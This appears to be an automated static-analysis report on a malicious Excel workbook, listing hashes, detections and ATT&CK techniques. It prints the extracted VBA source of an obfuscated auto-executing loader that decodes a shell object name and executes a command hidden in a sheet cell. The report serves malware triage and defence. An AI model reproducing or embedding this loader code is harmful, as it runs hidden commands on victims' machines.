Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 df7d0f5a7bebba87…

MALICIOUS

Office (OLE)

Size: 895.0 KB
Created: 2018-04-10 15:35:54
Authoring application: Microsoft Excel
First seen: 2019-01-12
MD5: b84c8a5982e88ef77e35e29b19ea0ab1
SHA-1: 67983cefd4ec081282a65a694e6285efadb75b60
SHA-256: df7d0f5a7bebba8746c851f3be59b6626441ac5ad781da8d0618a4d9f53e32a8
Risk Score: 402

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic; T1204.002 Malicious File

The file contains heavily obfuscated VBA and XLM macros, including Auto_Open and Document_Open subroutines. The VBA macro uses a custom decoder function 'UKP_R' to deobfuscate strings, one of which is 'ADA9B9C8BFC6CA84A9BEBBC2C2'. This deobfuscated string is then passed to VBA's CreateObject function, strongly suggesting it is used to instantiate a malicious object or execute a command. The presence of multiple auto-execution macros and obfuscation techniques indicates downloader or dropper functionality.

Heuristics (10)

  • ClamAV: Xls.Malware.Valyria-6934883-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Malware.Valyria-6934883-0
  • Excel 4.0 (XLM) Auto_Open + macro sheet [critical] (OLE_XLM_AUTOOPEN)
    Workbook contains an Auto_Open / Auto_Close defined name together with an Excel 4.0 macro sheet, the canonical XLM auto-execution shape used by malware families such as Emotet and QakBot.
  • VBA macros detected [medium] (6 related findings) (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader [critical] (OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Document_Open macro [high] (OLE_VBA_DOCOPEN)
    Document_Open macro
  • Workbook_Open macro [high] (OLE_VBA_WBOPEN)
    Workbook_Open macro
  • Auto_Open macro [high] (OLE_VBA_AUTO)
    Auto_Open macro
  • CreateObject call [high] (OLE_VBA_CREATEOBJ)
    CreateObject call
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact [info] (EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 229 bytes
SHA-256: fcf35f1fa50ffd18156c14626785018e91b64741c3871fd95926ff05070e1aa6
Preview script
First 1,000 lines of the extracted script
' 0085     13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  XPNo
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9259 bytes
SHA-256: 0a0198f403b55da5f8f628f7e95bcf9b3d325fe4ede5de4cff9bb859a0a5d89c
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 20 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Public Function UKP_R(ByVal text As String)
   Dim CW_ZD As String
   Dim P_L As Long
   For P_L = 1 To Len(text) Step 2
        CW_ZD = CW_ZD & Chr(Asc(Chr("&H" & Mid(text, P_L, 2))) - 86)
   Next
   UKP_R = CW_ZD
End Function
Public Sub Auto_Open()
    Application.Run "FIV_NV"
End Sub
Sub FIV_NV()
    C_F
End Sub
Public Sub Document_Open()
    Application.Run "FIV_NV"
End Sub
Public Sub C_F()
    Dim EYM_HG As Object: Set EYM_HG = VBA.CreateObject(UKP_R("ADA9B9C8BFC6CA84A9BEBBC2C2"))
    Dim K_WGC As String
K_WGC = "8C959595C0959578B495958CC086AAA595C8B99595958ABE958D95BA95958F95647F5C849595BEBF9595959695D1959595959563B1779EBDD095BAA5959561C9BCB15CA376959595B595669595CF6495959595689595955D95958B955A6F8D9595FE87CABFC595959595CA6795C8579595BF959595"
Dim PNF_J As String
PNF_J = "959595AF9561959C95B8957E95959DD3BAA3A99569949586AA8A60B295A495959595CB956C689595BDAA95A06695B695958695BF5DB45AC0569595B59588A462A995A491959595CE9E955F7A7B9595959D7895A976C3D16795958395BC74B6955995959F8CA65C8B959595959C95959E66959589B9"
Dim G_R As String
G_R = "7D9395959595678092637695C3D1959571CAC48595956CB795569595A6AD9FB38077959570BE5F9595957B9B86AC57A79586A05995C37C8868939596A995958D98B0958F5661BBA66F8B7E9295B59595B17D95AFCB95955E81859597958EA4639595BC6E957A958E9595D59586C7959595950E9595"
Dim BQX_KZ As String
BQX_KZ = "958B95959595C895BEC1BD586F9595D09595A39582C75B95CC8576AA95C0959A955795635D95C1955FB97F95958E9582956FC5958C95BD959CCEABA7AF9557C295BF956E95959595D2796395739595847E95A69595CFD1B15795956F7F94B89595AB9595A1839595B8AF957F95B579867895956295"
Dim AY_P As String
AY_P = "7F959556959595A99575A5B8B8AA95D14056956E579B95959A959571959595BBC072C183959595BCD3959595B49595A995958D6285669595B9839595B195959A9595958DC7A389956FAF95AA9595C69E7C95CA39958CB0B79595B7A66A609595ADA0B85A9595AF95959595CBBC95B39595AA8D9595"
Dim AKZ_Y As String
AKZ_Y = "95959595B95BA495A7CE649A9595715F7695B5959595809595BDA9B5D295C795BC959895957695E07C956F73958F83956DBC959595AE82C59595957B955DC99595D49B77569595AD8B945995959FB47CA48CAF8B9595D39595A5955C955C759090A6CC9562D59895B89595AA8B95AA95B795B99594"
Dim ISD_LM As String
ISD_LM = "87959595BBA695A2A6958E9595958898956C95A097567E9570959595C7955FC0CF819585959767669EC6CE95B1958495959595959595958B95B29595C8959595C45D9595AEBC8F869595637A9591CC8B9595BC7995D39595958A95BB9C959595B6959B7D957C938695CB9A95956795768A959595AF"
Dim LX_YKY As String
LX_YKY = "C79595D0957A9595955B95AA959595A593958CCDA68F9595959F95879567BCB4955AA99578956E95959483D3A36E7F95AD95957995CE95959595958E95A995959595718C9595959595CCCD958795A2AF95C1919595989593958CA8A095CDA195969195CB95B29595B6BE5F9579AB959595975D9595"
Dim S_NVB As String
S_NVB = "989C95BCC89595957995696173959595959595CB95959595C99595955FD5C8B9AE855A95976295CE9595659F956695719FC07EAE95AE95959570957995959595A1C2959595B75B959595955695A495AC6FB956D391C698956FABAF95D0955C9581959595AB9595A8956195A39595C7949394D5ACA0"
Dim T_MW As String
T_MW = "9EB587A99562959599959586959556C8CB95859595B1C6957095928795D19577CC95CA64959595955D9595959795C993629595958595B3957D7E95995D95959A9564869F95B9895C95BDD0AA959595958A957A74958D9595799595BF6B9595A795959588BD7F9595B39558958A5F56959564645E9595BB9572BF7B95D2959595957E9595C57161A4D1959E8B80957095B4955D9595959582796C955A6A829595607662B064956C9559956B73739595956095739595AC95BD"

    EYM_HG.Exec (UKP_R(ThisWorkbook.Sheets("XPNop").Range("J225").Value))
End Sub
Sub Workbook_Open()
    Application.Run "ThisWorkbook.FIV_NV"
End Sub

' Processing file: /opt/analyzer/scan_staging/84230c6656fb4eefa6ed0379246a4e1c.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/ThisWorkbook - 10253 bytes
' Line #0:
' 	Option  (Explicit)
' Line #1:
' 	FuncDefn (Public F
... (truncated)